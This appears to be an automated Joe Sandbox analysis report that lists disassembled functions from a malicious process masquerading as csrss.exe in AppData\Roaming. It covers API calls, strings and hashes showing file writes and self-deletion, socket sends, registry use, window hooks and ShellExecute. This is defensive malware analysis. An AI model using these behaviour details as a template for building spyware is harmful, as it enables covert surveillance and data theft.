Instruction ID: 8215c82e9917f733fc5338af8673029706bb38df390d6aed4ec850643705ee46
Opcode Fuzzy Hash: ffb6417a27506c6c3c9abdb28609299a02aaeb9cad5dd726c3daec9467b58b7e
Instruction Fuzzy Hash: 88419137E043019BDB14FF75C89886F77FAAB85650F80092CF55297990EF34990AC7A2

Function 33D47963 Relevance: 9.1, APIs: 6, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 33D479C5
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 33D47A0D

Part of subcall function 33D44AA1: send.WS2_32(756F1AE8,00000000,00000000,00000000), ref: 33D44B36

CloseHandle.KERNEL32(00000000), ref: 33D47A4D
MoveFileW.KERNEL32(00000000,00000000), ref: 33D47A6A
CloseHandle.KERNEL32(00000000), ref: 33D47A95
DeleteFileW.KERNEL32(00000000), ref: 33D47AA5

Part of subcall function 33D44B96: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 33D44BA5
Part of subcall function 33D44B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,33D4548B,33D454A0), ref: 33D44BC3

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID:
API String ID: 1303771098-0
Opcode ID: 73e0214ce6bc0c18c122c623363e2571dafccac55028b39ebf1ffb20ab07411a
Instruction ID: d5316179cd00d7c12c1a706d5ddfacb2d0ae09c33563c98d6fd9720f8d5e91cb
Opcode Fuzzy Hash: 73e0214ce6bc0c18c122c623363e2571dafccac55028b39ebf1ffb20ab07411a
Instruction Fuzzy Hash: AF318D72908341AFD310DF20CC8599FB7E8FF94655F404A1DB58AA2581EF70EA49CBA6

Function 33D88215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
_free.LIBCMT ref: 33D8824C
_free.LIBCMT ref: 33D88274
SetLastError.KERNEL32(00000000), ref: 33D88281
SetLastError.KERNEL32(00000000), ref: 33D8828D
_abort.LIBCMT ref: 33D88293

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 38d99ba489e1473a37f7a32bca3c4c23ad6f54500237d3a24fe0f3f111127f51
Instruction ID: aa16cebea19ec24c4971774fd18022e2d65a5c849dbf5942a943cb845714149d
Opcode Fuzzy Hash: 38d99ba489e1473a37f7a32bca3c4c23ad6f54500237d3a24fe0f3f111127f51
Instruction Fuzzy Hash: 9CF0A93A904B006AE6413336DC45B5F26699BC2BB7F290614F965AE580EF30A90642B4

Function 33D59FB4 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 176timeCOMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 33D5A077
GetLocalTime.KERNEL32(?), ref: 33D5A105

Strings

wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 33D5A09A, 33D5A0BB, 33D5A129
time_%04i%02i%02i_%02i%02i%02i, xrefs: 33D5A09F
H#z, xrefs: 33D5A016, 33D5A0C9, 33D5A1AD

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CreateDirectoryLocalTime
String ID: H#z$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 467499730-3269061970
Opcode ID: a5ed3d60d45a8eb51d5a614e625c0fe5903c70e25adf6d9d34c5685ec473d298
Instruction ID: 5e7b8b4863ac442b01fe3de2792c8aadc03f6fb98db16a46311f3aa9706eebdf
Opcode Fuzzy Hash: a5ed3d60d45a8eb51d5a614e625c0fe5903c70e25adf6d9d34c5685ec473d298
Instruction Fuzzy Hash: 17519372E403199BEF14EBB5CC509EDBBB9AF54210F440019F546ABA81EF349E4AC7B0

Function 33D83435 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\csrss.exe,00000104), ref: 33D83475
_free.LIBCMT ref: 33D83540
_free.LIBCMT ref: 33D8354A

Strings

0/l, xrefs: 33D8347B
C:\Users\user\AppData\Roaming\csrss.exe, xrefs: 33D8346C, 33D83473, 33D834A2, 33D834DA

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: _free$FileModuleName
String ID: 0/l$C:\Users\user\AppData\Roaming\csrss.exe
API String ID: 2506810119-2265870100
Opcode ID: 6713ff70dad2a37d81d508ac993bea0382a1c1aa824161075136d70829ff82b8
Instruction ID: 4b5ced937d96aac254d6475f1584350c41d06f68edfa163783a317f9b84ef08c
Opcode Fuzzy Hash: 6713ff70dad2a37d81d508ac993bea0382a1c1aa824161075136d70829ff82b8
Instruction Fuzzy Hash: 6C3156BAD01358EFD722DF9DD88499EBBFCEB45710B144096E54CABA10D670AA41C7A0

Function 33D5D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 33D5D55B
CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 33D5D576
GetLastError.KERNEL32 ref: 33D5D580

Strings

MsgWindowClass, xrefs: 33D5D526
0, xrefs: 33D5D52B

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: fa63d0a362ba745dcb6a02ee7b4b989d746c51501f7523b4ed8985c76cc2bf88
Instruction ID: b9f27ee2be87b5f427b9d1ea83802a9b16a91480c2b6745bb55a5473ea7f18ce
Opcode Fuzzy Hash: fa63d0a362ba745dcb6a02ee7b4b989d746c51501f7523b4ed8985c76cc2bf88
Instruction Fuzzy Hash: 8301E9B1D00219ABEB01DFE9DC849EFBBBCEB05294F90052AF911A6240E7715A058BB1

Function 33D8333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,33D832EB,00000003,?,33D8328B,00000003,33DAE948,0000000C,33D833E2,00000003,00000002), ref: 33D8335A
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,33D832EB,00000003,?,33D8328B,00000003,33DAE948,0000000C,33D833E2,00000003,00000002), ref: 33D8336D
FreeLibrary.KERNEL32(00000000,?,?,?,33D832EB,00000003,?,33D8328B,00000003,33DAE948,0000000C,33D833E2,00000003,00000002,00000000), ref: 33D83390

Strings

mscoree.dll, xrefs: 33D83353
CorExitProcess, xrefs: 33D83365

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a889995add13d43095b4eb8bd7ad9d8ca49c880bc30e8f8e3049e2359058a579
Instruction ID: a733b2ee62fb036f6fd86b4ac46c8a2447d97d65636277729f999c707049b205
Opcode Fuzzy Hash: a889995add13d43095b4eb8bd7ad9d8ca49c880bc30e8f8e3049e2359058a579
Instruction Fuzzy Hash: 98F04475E01109FFDB01AFA1C848BADBFF4EF04752F444199F80AA6140DB755A55CB90

Function 33D8139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c8c0af38b1df915e3f80435b6b8091e5512f40afa11ef5ad370dd932cd766b6
Instruction ID: 8bb5f9aac033f997b1f0f35ec995caf97f010d989344cff25fa79607bad67bb8
Opcode Fuzzy Hash: 8c8c0af38b1df915e3f80435b6b8091e5512f40afa11ef5ad370dd932cd766b6
Instruction Fuzzy Hash: 34711A79D01316DBDB11CF59C844AEFBBB9FF45790F580265E4526F280CB70A949C7A0

Function 33D84CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 33D86137: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 33D86169

_free.LIBCMT ref: 33D84E06
_free.LIBCMT ref: 33D84E1D
_free.LIBCMT ref: 33D84E3C
_free.LIBCMT ref: 33D84E57
_free.LIBCMT ref: 33D84E6E

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: b035e29c698064aea1d02f8717cd098ee9382823afb74972a486ea5331b185d1
Instruction ID: fd48b293e4fc81def7b53df9112013181a99d3adc4e982c621fc0c52ab0cf75b
Opcode Fuzzy Hash: b035e29c698064aea1d02f8717cd098ee9382823afb74972a486ea5331b185d1
Instruction Fuzzy Hash: C6510476A00308AFE711CF69CC40A6AB3F9EF44B25F444659E859DF650E731FA41CB90

Function 33D83DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 33D83E6B
_free.LIBCMT ref: 33D83E8B

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b56fd5466eaad276a3838a21bbdcbc34b452fc4c98d03334bc423ca23bafdd5d
Instruction ID: e2294fb51e73d7112a5b28547b8eb84a1b7b40d882866ec19c0f3b6d798d8c28
Opcode Fuzzy Hash: b56fd5466eaad276a3838a21bbdcbc34b452fc4c98d03334bc423ca23bafdd5d
Instruction Fuzzy Hash: 5E41C17AE003049FDB15DF78C881A5EB3F5EF88B24F1542A9D559EF640DA31B901CB90

Function 33D8F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 33D8F363
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 33D8F386

Part of subcall function 33D86137: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 33D86169

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 33D8F3AC
_free.LIBCMT ref: 33D8F3BF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 33D8F3CE

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 4d86a1393cfbf8e5baa95ca7699d4e56be7b7a0e44cb1509af7d154cae7d66c7
Instruction ID: 2c5d25e87ae083f4430af60eb8d67944e88ff2fbcd2c0b5c22f56281f175967e
Opcode Fuzzy Hash: 4d86a1393cfbf8e5baa95ca7699d4e56be7b7a0e44cb1509af7d154cae7d66c7
Instruction Fuzzy Hash: 080184B7E017157F27111ABAAC8CC7F6AADDAC6EA57550329FD04DE240DE71AD0281B0

Function 33D88299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,33D805E2,33D861B8,?,?,33D6F8A7,?,00000008,33D6F9A6,00000001,?,?,?), ref: 33D8829E
_free.LIBCMT ref: 33D882D3
_free.LIBCMT ref: 33D882FA
SetLastError.KERNEL32(00000000,?,?,?), ref: 33D88307
SetLastError.KERNEL32(00000000,?,?,?), ref: 33D88310

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: dbd5616bf8d3394f6b8f20eedca9974032b5a655e1c22cf5893d60dd09453329
Instruction ID: 1af8021ceb75fd2f4f3e56855e3995a18d1a04884bfe437b8b7c081d6d25b149
Opcode Fuzzy Hash: dbd5616bf8d3394f6b8f20eedca9974032b5a655e1c22cf5893d60dd09453329
Instruction Fuzzy Hash: 5B01C83FD05B406BE3026636DC84E4B266EEFC26B77250529F869EE581FF70A90641B4

Function 33D5C1DD Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 33D5C1F5
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 33D5C208
GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 33D5C228
CloseHandle.KERNEL32(00000000), ref: 33D5C233
CloseHandle.KERNEL32(00000000), ref: 33D5C23B

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Process$CloseHandleOpen$FileImageName
String ID:
API String ID: 2951400881-0
Opcode ID: 22ec7c31b4e2f1e4a5e25e63c2f283676f063f4d0df472a788240227ffcd34e9
Instruction ID: ea1cf3c57869fbefa3e30e1b63be120e800781ec3d2a7d1f213f8b16e5394d9c
Opcode Fuzzy Hash: 22ec7c31b4e2f1e4a5e25e63c2f283676f063f4d0df472a788240227ffcd34e9
Instruction Fuzzy Hash: AC01F9B6640315ABFA01A7E8CC49F67B3BCDB84AD5F000156FA59E3191EFB04E468671

Function 33D909BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 33D909D4

Part of subcall function 33D86782: HeapFree.KERNEL32(00000000,00000000), ref: 33D86798
Part of subcall function 33D86782: GetLastError.KERNEL32(?,?,33D90C6F,?,00000000,?,00000000,?,33D90F13,?,00000007,?,?,33D9145E,?,?), ref: 33D867AA

_free.LIBCMT ref: 33D909E6
_free.LIBCMT ref: 33D909F8
_free.LIBCMT ref: 33D90A0A
_free.LIBCMT ref: 33D90A1C

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 312fcd471db58850f757a0a0966f7323bfabb09ff82447765eb3b7eccb90c7d1
Instruction ID: 025bab3496f06110afb7161efb7d7a113ec5dc1b56c136876c2bed8ef9760227
Opcode Fuzzy Hash: 312fcd471db58850f757a0a0966f7323bfabb09ff82447765eb3b7eccb90c7d1
Instruction Fuzzy Hash: 4FF012B6904204E79710EA5DF8C2C5A73DDFA04B637A48905F169EBD40DB34FD8546E8

Function 33D87571 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 33D87723
__freea.LIBCMT ref: 33D87741

Part of subcall function 33D75E40: _free.LIBCMT ref: 33D75E56

Strings

am/pm, xrefs: 33D877A4
a/p, xrefs: 33D87808

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 1441d2a33ab05da165f257191d36cd83c2aa44899464aea54e78eb510eea9de0
Instruction ID: e4f058638f0f9d9163a3d1a3e54f517bcdeb4aa375807747f9ab476d71a5b1e0
Opcode Fuzzy Hash: 1441d2a33ab05da165f257191d36cd83c2aa44899464aea54e78eb510eea9de0
Instruction Fuzzy Hash: 39D124B9D10326CAEB049F68C881BFAB7B5FF05B00F584159F584AF650D735B982CBA1

Function 33D8E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 33D8E738
_free.LIBCMT ref: 33D8E855

Part of subcall function 33D7BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 33D7BD1B
Part of subcall function 33D7BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 33D7BD3D
Part of subcall function 33D7BD19: TerminateProcess.KERNEL32(00000000), ref: 33D7BD44

Strings

., xrefs: 33D8EA0C
*?, xrefs: 33D8E72C

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: a48c11b8db2101b1b15023346f140ef2cd028aedaf42e17176890741c8bd77f5
Instruction ID: 85d2646abfc3866321f6f8ac31ed7bbd6e59a4286fc2db9048bec2f697c7497a
Opcode Fuzzy Hash: a48c11b8db2101b1b15023346f140ef2cd028aedaf42e17176890741c8bd77f5
Instruction Fuzzy Hash: D751A475E00209EFDB04CFA9CC80AADBBB9FF88754F244169D854EB750D675AA018F91

Function 33D57495 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,33DA6108,33DAC7B0,00000000,00000000,00000000), ref: 33D574F5

Part of subcall function 33D5C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 33D5C49E

Sleep.KERNEL32(00000064), ref: 33D57521
DeleteFileW.KERNEL32(00000000), ref: 33D57555

Strings

/t , xrefs: 33D574D4

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t
API String ID: 1462127192-3161277685
Opcode ID: c8c2dcda826e8ad14b808968a71643df190b0fa2214d6d2c4f988121f67a3098
Instruction ID: 30cb52dec523c3af208971216120470a095a6725eed34891fecf32e21b46f1ad
Opcode Fuzzy Hash: c8c2dcda826e8ad14b808968a71643df190b0fa2214d6d2c4f988121f67a3098
Instruction Fuzzy Hash: 54313E72C013199ADF14EBA5DC95EFDB778AF10211F800169E506A7891EF606A8FCAA4

Function 33D8BD6C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000), ref: 33D8BDC2
GetLastError.KERNEL32(?,33D8BC8A,33D7588A,33DAEBB0,0000000C), ref: 33D8BDCC
__dosmaperr.LIBCMT ref: 33D8BDF7

Strings

P?z, xrefs: 33D8BD86

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: P?z
API String ID: 2583163307-2079540668
Opcode ID: 69c84f380b4cd2cf92fa3067586472863923727f7abdfe48b22b1c1c38573a72
Instruction ID: d5f3f618fedd27ac2793af5f40cc1956c14e5f8d7317143b8c6d5337c63acada
Opcode Fuzzy Hash: 69c84f380b4cd2cf92fa3067586472863923727f7abdfe48b22b1c1c38573a72
Instruction Fuzzy Hash: C2012B37A04350B6F3052238F8457AE279D5F82F79F6D451DE876DF1C1DE64A88182A1

Function 33D53814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 33D5381F
RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00000000,00000000,33DB52F0,?,33D4F823,pth_unenc,@{t), ref: 33D5384D
RegCloseKey.ADVAPI32(?,?,33D4F823,pth_unenc,@{t), ref: 33D53858

Strings

pth_unenc, xrefs: 33D53818

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: a0a24a309a79dd17dba65ef5a8403fbdae65fb067a048b8b30edbce1e7dc6879
Instruction ID: df3680bed7d932d214e1e29a3e7c4d59237dd855ce983feaa42513d0d70647db
Opcode Fuzzy Hash: a0a24a309a79dd17dba65ef5a8403fbdae65fb067a048b8b30edbce1e7dc6879
Instruction Fuzzy Hash: BAF09072940218BBEF109FA1EC45FEE3B6CEF44651F104115F91AA6550EB329B25DBA0

Function 33D5361B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,33DA6F6C,H#z), ref: 33D5363D
RegQueryValueExW.ADVAPI32(33DA6F6C,33D4F313,00000000,00000000,?,00000400), ref: 33D5365C
RegCloseKey.ADVAPI32(33DA6F6C), ref: 33D53665

Strings

H#z, xrefs: 33D53624

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: H#z
API String ID: 3677997916-2410801705
Opcode ID: 92b2675ba9f50e5d4c0d76ee191fe23ef0001cf2177ba879d75b06e92ed4a925
Instruction ID: 1f8899ddfe235838279afb1b829042b55581c1e25abba5e5514a4ae73bf0a45c
Opcode Fuzzy Hash: 92b2675ba9f50e5d4c0d76ee191fe23ef0001cf2177ba879d75b06e92ed4a925
Instruction Fuzzy Hash: D1F04F76500218FBEF509BA0CC45FDDB7BCEB04700F108095BA55F5250DB715A589BA4

Function 33D4B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(33D4A27D,00000000,33DB52F0,pth_unenc,33D4D0B8,@{t,33DB52F0,?,pth_unenc), ref: 33D4B8BB
UnhookWindowsHookEx.USER32(33DB50F0), ref: 33D4B8C7
TerminateThread.KERNEL32(33D4A267,00000000,?,pth_unenc), ref: 33D4B8D5

Strings

pth_unenc, xrefs: 33D4B8AC

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: TerminateThread$HookUnhookWindows
String ID: pth_unenc
API String ID: 3123878439-4028850238
Opcode ID: 8c5781231a90f703b7934a751b1be9325e43d3d409c3bfb10ff016220c0fb763
Instruction ID: b9b5726f30a11a00cdca278ff4643076bb98c7b56928fa98ec0ea00ef7a52ea4
Opcode Fuzzy Hash: 8c5781231a90f703b7934a751b1be9325e43d3d409c3bfb10ff016220c0fb763
Instruction Fuzzy Hash: C8E01276105356EFDB542FA0C8D88157AEEDB18285354047EF2D356511CE720D14CB50

Function 33D52AB4 Relevance: 6.5, APIs: 4, Instructions: 482fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 33D52ACD

Part of subcall function 33D5B978: GetCurrentProcessId.KERNEL32(00000000,33D9928C,00000000,?,?,?,?,33DA6468,33D4D20D,33DA6F7C), ref: 33D5B99F

Part of subcall function 33D58568: CloseHandle.KERNEL32(33D440F5), ref: 33D5857E
Part of subcall function 33D58568: CloseHandle.KERNEL32(33DA5E74), ref: 33D58587

DeleteFileW.KERNEL32(00000000,33DA5E74,33DA5E74,33DA5E74), ref: 33D52DC5
DeleteFileW.KERNEL32(00000000,33DA5E74,33DA5E74,33DA5E74), ref: 33D52DFC
DeleteFileW.KERNEL32(00000000,33DA5E74,33DA5E74,33DA5E74), ref: 33D52E38

Part of subcall function 33D44AA1: send.WS2_32(756F1AE8,00000000,00000000,00000000), ref: 33D44B36

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID:
API String ID: 1937857116-0
Opcode ID: a6d4a51793ceb9c223f918a97f63202ea9fea42fac5c5fa0c857e324f2c74d4b
Instruction ID: ad42674151350819cc7673d7efc58c2f2cf84430e3454d400f9c51d38c3bef39
Opcode Fuzzy Hash: a6d4a51793ceb9c223f918a97f63202ea9fea42fac5c5fa0c857e324f2c74d4b
Instruction Fuzzy Hash: CE0234329483818BD725DB75D890BEFB7E5AFD4200F904D2DE48A87991EF305A4EC762

Function 33D8A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 33D8A08F
__alldvrm.LIBCMT ref: 33D8A290
__alldvrm.LIBCMT ref: 33D8A2B2

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: fa5adc363d90c346da196b13896c6d81691097b48ecd6299cf525d8ecdee76a8
Instruction ID: a7978fb82f54a94d0b3de53a2feda83363890f1640ade4055ac5d2c732b6054d
Opcode Fuzzy Hash: fa5adc363d90c346da196b13896c6d81691097b48ecd6299cf525d8ecdee76a8
Instruction Fuzzy Hash: 01A18975E003869FE721CF68C880BAEBBE5FF15350F18416ED9849F281D639AA55C760

Function 33D5C68F Relevance: 6.2, APIs: 4, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,33DACAE0,00000000,00020019,?), ref: 33D5C6B1
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 33D5C6F5

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: EnumOpen
String ID:
API String ID: 3231578192-0
Opcode ID: 57e2598bd63b6fa6deed10805f1d463aa1d87ae70dc1b37522cf57957c75ecef
Instruction ID: 58c48785b5dbf5f8eee16c4ec3cad80b0abf07f3fa5e13c562128835452b6411
Opcode Fuzzy Hash: 57e2598bd63b6fa6deed10805f1d463aa1d87ae70dc1b37522cf57957c75ecef
Instruction Fuzzy Hash: 03814F725083419BD724DB24D850EEFB7E8BF94304F50492DA59A83990FF30A94ECBA2

Function 33D96C1A Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 33D96D49

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
